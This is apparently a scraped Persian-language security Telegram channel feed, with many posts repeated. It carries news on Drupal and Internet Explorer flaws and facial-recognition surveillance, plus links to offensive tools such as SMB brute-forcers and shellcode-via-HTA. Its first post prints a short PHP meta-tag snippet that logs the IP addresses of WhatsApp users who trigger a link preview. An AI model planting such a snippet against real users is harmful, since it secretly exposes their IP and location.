افشای آی پی کاربران whatsapp با قابلیت پیش نمایش لینک
در پیامرسان واتس اپ میتوان با قطعه کد ساده php و ارسال لینک به کاربر، آدرس ip وی را بدست آورد.
این قطعه کد به شکل زیر میباشد:
<meta property="og:description" content="<?php
echo $_SERVER[REMOTE_ADDR]; $line = date(’Y-m-d H:i:s’) . " - $_SERVER[REMOTE_ADDR]";echo $line;
file_put_contents(’visitors.log’, $line . PHP_EOL, FILE_APPEND);?>" />
قطعه کد فوق باید در یک فایل php در سرور ذخیره و زمانی که پیش نمایش آن در واتس اپ ایجاد شود، آی پی کاربر در سرور مهاجم ثبت خواهد شد.
منبع: https://medium.com/@kankrale.rahul/whatsapp-users-ip-disclosure-with-link-preview-feature-39a477f54fba
#privacy #whatsapp
@sec_nerd
در پیامرسان واتس اپ میتوان با قطعه کد ساده php و ارسال لینک به کاربر، آدرس ip وی را بدست آورد.
این قطعه کد به شکل زیر میباشد:
<meta property="og:description" content="<?php
echo $_SERVER[REMOTE_ADDR]; $line = date(’Y-m-d H:i:s’) . " - $_SERVER[REMOTE_ADDR]";echo $line;
file_put_contents(’visitors.log’, $line . PHP_EOL, FILE_APPEND);?>" />
قطعه کد فوق باید در یک فایل php در سرور ذخیره و زمانی که پیش نمایش آن در واتس اپ ایجاد شود، آی پی کاربر در سرور مهاجم ثبت خواهد شد.
منبع: https://medium.com/@kankrale.rahul/whatsapp-users-ip-disclosure-with-link-preview-feature-39a477f54fba
#privacy #whatsapp
@sec_nerd
Medium
Whatsapp user’s IP disclosure with Link Preview feature
Simple php code can disclose Whatsapp users ip and app version and save disclosed information to attackers server.
برای بار دوم در طی این ماه، آسیب پذیری مهمی در هسته دروپال کشف شد.
این آسیب پذیری که از نوع XSS میباشد در پلاگین CKEditor وجود دارد.
هرچه زودتر اقدام به بروزرسانی وبسایت خود نمایید.
https://thehackernews.com/2018/04/drupal-site-vulnerability.html
#xss
#web
#drupal
@sec_nerd
این آسیب پذیری که از نوع XSS میباشد در پلاگین CKEditor وجود دارد.
هرچه زودتر اقدام به بروزرسانی وبسایت خود نمایید.
https://thehackernews.com/2018/04/drupal-site-vulnerability.html
#xss
#web
#drupal
@sec_nerd
The Hacker News
Another Critical Flaw Found In Drupal Core—Patch Your Sites Immediately
Drupal has been found vulnerable to critical cross-site scripting (XSS) vulnerability that could allow remote attackers to execute malicious code in the victim's web browser.
جعبه ابزار تست نفوذ به اینترنت اشیاء
در این مقاله با ابزارهای مختلف برای انجام تست نفوذ بر روی دستگاههای هوشمند و ویجت های متصل به اینترنت آشنا خواهید شد
https://systemoverlord.com/2018/04/16/the-iot-hackers-toolkit.html
#tools
#network
#iot
#pentest
@sec_nerd
در این مقاله با ابزارهای مختلف برای انجام تست نفوذ بر روی دستگاههای هوشمند و ویجت های متصل به اینترنت آشنا خواهید شد
https://systemoverlord.com/2018/04/16/the-iot-hackers-toolkit.html
#tools
#network
#iot
#pentest
@sec_nerd
System Overlord
The IoT Hacker’s Toolkit
IoT and embedded devices provide new challenges to security engineers hoping to understand and evaluate the attack surface these devices add. From new interfaces to uncommon operating systems and software, the devices require both skills and tools just a…
جمع آوری اطلاعات از اهداف مختلف
https://github.com/Moham3dRiahi/Th3inspector/
#osint
#pentest
#web
#social_engineering
@sec_nerd
https://github.com/Moham3dRiahi/Th3inspector/
#osint
#pentest
#web
#social_engineering
@sec_nerd
Red Team Arsenal
اسکنر امنیتی لایه ۷ برای متخصصان امنیت
https://github.com/flipkart-incubator/RTA
#pentest
#web
#network
@sec_nerd
اسکنر امنیتی لایه ۷ برای متخصصان امنیت
https://github.com/flipkart-incubator/RTA
#pentest
#web
#network
@sec_nerd
پس از شرکت Cambridge Analytica اینبار شرکت دیگری پیدا شده است که از دیتای کاربران فیسبوک سوء استفاده میکند.
شرکت localblox که یک شرکت داده پردازی است، اقدام به ساخت پایگاه داده ای از کاربران فیسبوک، توییتر، لینکدین و برخی شبکه اجتماعی دیگر کرده است.
این شرکت در زمینه حقوق بشر فعالیت دارد و از سال ۲۰۱۰ اقدام به جمع آوری اطلاعات از افراد در فرمت های متفاوت میکند.
این شرکت ادعا میکند که بیش از ۶۵۰ میلیون رکورد در دیتابیس خود دارد که ۱۸۰ میلیون از این تعداد رکورد، همراه با شماره تلفن همراه کاربران میباشد.
اطلاعات بیشتر:
https://www.hackread.com/localblox-exposes-millions-of-facebook-linkedin-data/
#facebook
#privacy
#news
#twitter
@sec_nerd
شرکت localblox که یک شرکت داده پردازی است، اقدام به ساخت پایگاه داده ای از کاربران فیسبوک، توییتر، لینکدین و برخی شبکه اجتماعی دیگر کرده است.
این شرکت در زمینه حقوق بشر فعالیت دارد و از سال ۲۰۱۰ اقدام به جمع آوری اطلاعات از افراد در فرمت های متفاوت میکند.
این شرکت ادعا میکند که بیش از ۶۵۰ میلیون رکورد در دیتابیس خود دارد که ۱۸۰ میلیون از این تعداد رکورد، همراه با شماره تلفن همراه کاربران میباشد.
اطلاعات بیشتر:
https://www.hackread.com/localblox-exposes-millions-of-facebook-linkedin-data/
#privacy
#news
@sec_nerd
HackRead
Localblox exposes personal data of millions of Facebook & LinkedIn users
It seems like data breaches season is far from over for Facebook since 48 million Facebook profiles were exploited for the creation of a database by a Localblox.
ماشین مجازی caldera برای تشخیص و شبیه سازی خطر
https://github.com/redhuntlabs/RedHunt-OS/
#vm
#tool
@sec_nerd
https://github.com/redhuntlabs/RedHunt-OS/
#vm
#tool
@sec_nerd
تیم شرکت چینی آنتی ویروس Qihoo 360 گزارشی را در خصوص یک آسیب پذیری 0day در اینترنت اکسپلورر به مایکروسافت ارسال کرده است.
این آسیب پذیری از سوی یک گروه APT شناخته شده در حال استفاده است و از مشکلی به نام double kill برای پیاده سازی حمله خود بهره میبرد.
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/internet-explorer-zero-day-exploited-in-the-wild-by-apt-group/
#news
#windows
#microsoft
#IE
#0day
@sec_nerd
این آسیب پذیری از سوی یک گروه APT شناخته شده در حال استفاده است و از مشکلی به نام double kill برای پیاده سازی حمله خود بهره میبرد.
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/internet-explorer-zero-day-exploited-in-the-wild-by-apt-group/
#news
#windows
#microsoft
#IE
#0day
@sec_nerd
BleepingComputer
Internet Explorer Zero-Day Exploited in the Wild by APT Group
An advanced persistent threat (APT), a term sometimes used to describe nation-state-backed cyber-espionage units, is using a zero-day vulnerability in the Internet Explorer kernel code to infect victims with malware.
به گزارش فوربس، یک شرکت مخفی نظارتی که توسط یک اسراییلی تاسیس شده، از پنج سال پیش اقدام به ساخت یک دیتابیس تشخیص چهره بسیار بزرگ از تصاویر جمع آوری شده از فیسبوک، یوتیوب و وبسایتهای دیگر کرده است.
این یک هشدار برای فعالان حریم خصوصی است.
هسته تکنولوژی تشخیص چهره Face-Int نام دارد و الان در اختیار شرکت اسراییلی Verint می باشد.
شرکت فوق در سال ۲۰۱۷ با نام Terrogence فعالیت میکرد و هردوی این شرکتها جزو تامین کنندگان حکومت امریکا هستند که تکنولوژی های جاسوسی برای سازمان NSA فراهم می آورند.
دیتابیس وب سایت Terrogence شامل تصاویر پروفایل جمع آوری شده از فیسبوک، توییتر و انجمن های موجود و قبلی در کل جهان است. چهره ها از ۳۵ هزار ویدیو و عکس تروریستها در کمپ ها و حملاتشان جمع آوری شده است.
اطلاعات بیشتر:
https://www.forbes.com/sites/thomasbrewster/2018/04/16/huge-facebook-facial-recognition-database-built-by-ex-israeli-spies/#44163ac67f18
#news
#facebook
#israel
#usa
#surveillance
@sec_nerd
این یک هشدار برای فعالان حریم خصوصی است.
هسته تکنولوژی تشخیص چهره Face-Int نام دارد و الان در اختیار شرکت اسراییلی Verint می باشد.
شرکت فوق در سال ۲۰۱۷ با نام Terrogence فعالیت میکرد و هردوی این شرکتها جزو تامین کنندگان حکومت امریکا هستند که تکنولوژی های جاسوسی برای سازمان NSA فراهم می آورند.
دیتابیس وب سایت Terrogence شامل تصاویر پروفایل جمع آوری شده از فیسبوک، توییتر و انجمن های موجود و قبلی در کل جهان است. چهره ها از ۳۵ هزار ویدیو و عکس تروریستها در کمپ ها و حملاتشان جمع آوری شده است.
اطلاعات بیشتر:
https://www.forbes.com/sites/thomasbrewster/2018/04/16/huge-facebook-facial-recognition-database-built-by-ex-israeli-spies/#44163ac67f18
#news
#israel
#usa
#surveillance
@sec_nerd
Forbes
These Ex-Spies Are Harvesting Facebook Photos For A Massive Facial Recognition Database
Thought Cambridge Analytica was creepy? This Israeli surveillance juggernaut is sitting on a massive database of faces taken from Facebook and YouTube, all feeding facial recognition tech for national governments.
بروت فورس یوزرنیم و پسوردها بر روی سرور با استفاده از SMB
github.com/m4ll0k/SMBrute
#windows
#smb
#network
#bruteforce
@sec_nerd
github.com/m4ll0k/SMBrute
#windows
#smb
#network
#bruteforce
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
اجرای شل کد با استفاده از فایلهای HTA
https://github.com/johnjohnsp1/Shellcode-Via-HTA
#windows
#network
#pentest
@sec_nerd
https://github.com/johnjohnsp1/Shellcode-Via-HTA
#windows
#network
#pentest
@sec_nerd
GitHub
GitHub - johnjohnsp1/Shellcode-Via-HTA: How To Execute Shellcode via HTA
How To Execute Shellcode via HTA. Contribute to johnjohnsp1/Shellcode-Via-HTA development by creating an account on GitHub.
تکنولوژی تشخیص چهره (facial recognition) در چین به اوج خود رسید و پلیس این کشور موفق شد یک مضنون را در بین جمعیت ۶۰ هزار نفری یک کنسرت شناسایی کند!
پلیس اعلام کرد یک مجرم فراری ۳۱ ساله را در کنسرت Jacky Cheung شناسایی و دستگیر کرد.
دوربین های بخش بررسی بلیطها به تکنولوژی تشخیص چهره مجهز بودند و این فرد به خوبی توسط دوربین ها شناسایی شد.
چین در حال حاضر ۱۷۰ میلیون دوربین مداربسته دارد و ۴۰۰ میلیون دوربین دیگر نیز قرار است طی سه سال آینده به تعداد فعلی اضافه شوند.
اکثر این دوربین ها به هوش مصنوعی و تشخیص چهره مجهز هستند.
اطلاعات بیشتر:
https://www.hackread.com/police-locate-suspect-from-a-crowd-using-facial-recognition/
#facial_recognition
#china
#privacy
@sec_nerd
پلیس اعلام کرد یک مجرم فراری ۳۱ ساله را در کنسرت Jacky Cheung شناسایی و دستگیر کرد.
دوربین های بخش بررسی بلیطها به تکنولوژی تشخیص چهره مجهز بودند و این فرد به خوبی توسط دوربین ها شناسایی شد.
چین در حال حاضر ۱۷۰ میلیون دوربین مداربسته دارد و ۴۰۰ میلیون دوربین دیگر نیز قرار است طی سه سال آینده به تعداد فعلی اضافه شوند.
اکثر این دوربین ها به هوش مصنوعی و تشخیص چهره مجهز هستند.
اطلاعات بیشتر:
https://www.hackread.com/police-locate-suspect-from-a-crowd-using-facial-recognition/
#facial_recognition
#china
#privacy
@sec_nerd
HackRead
Police locate suspect from a crowd of 60,000 using Facial Recognition
The fugitive was successfully identified from within the crowd of thousands of attendees through the facial recognition technology, which provided surprisingly accurate results.
امنیت اطلاعات
اکسپلویت Drupal منتشر شد https://isc.sans.edu/diary.html #drupal #exploit #rce @sec_nerd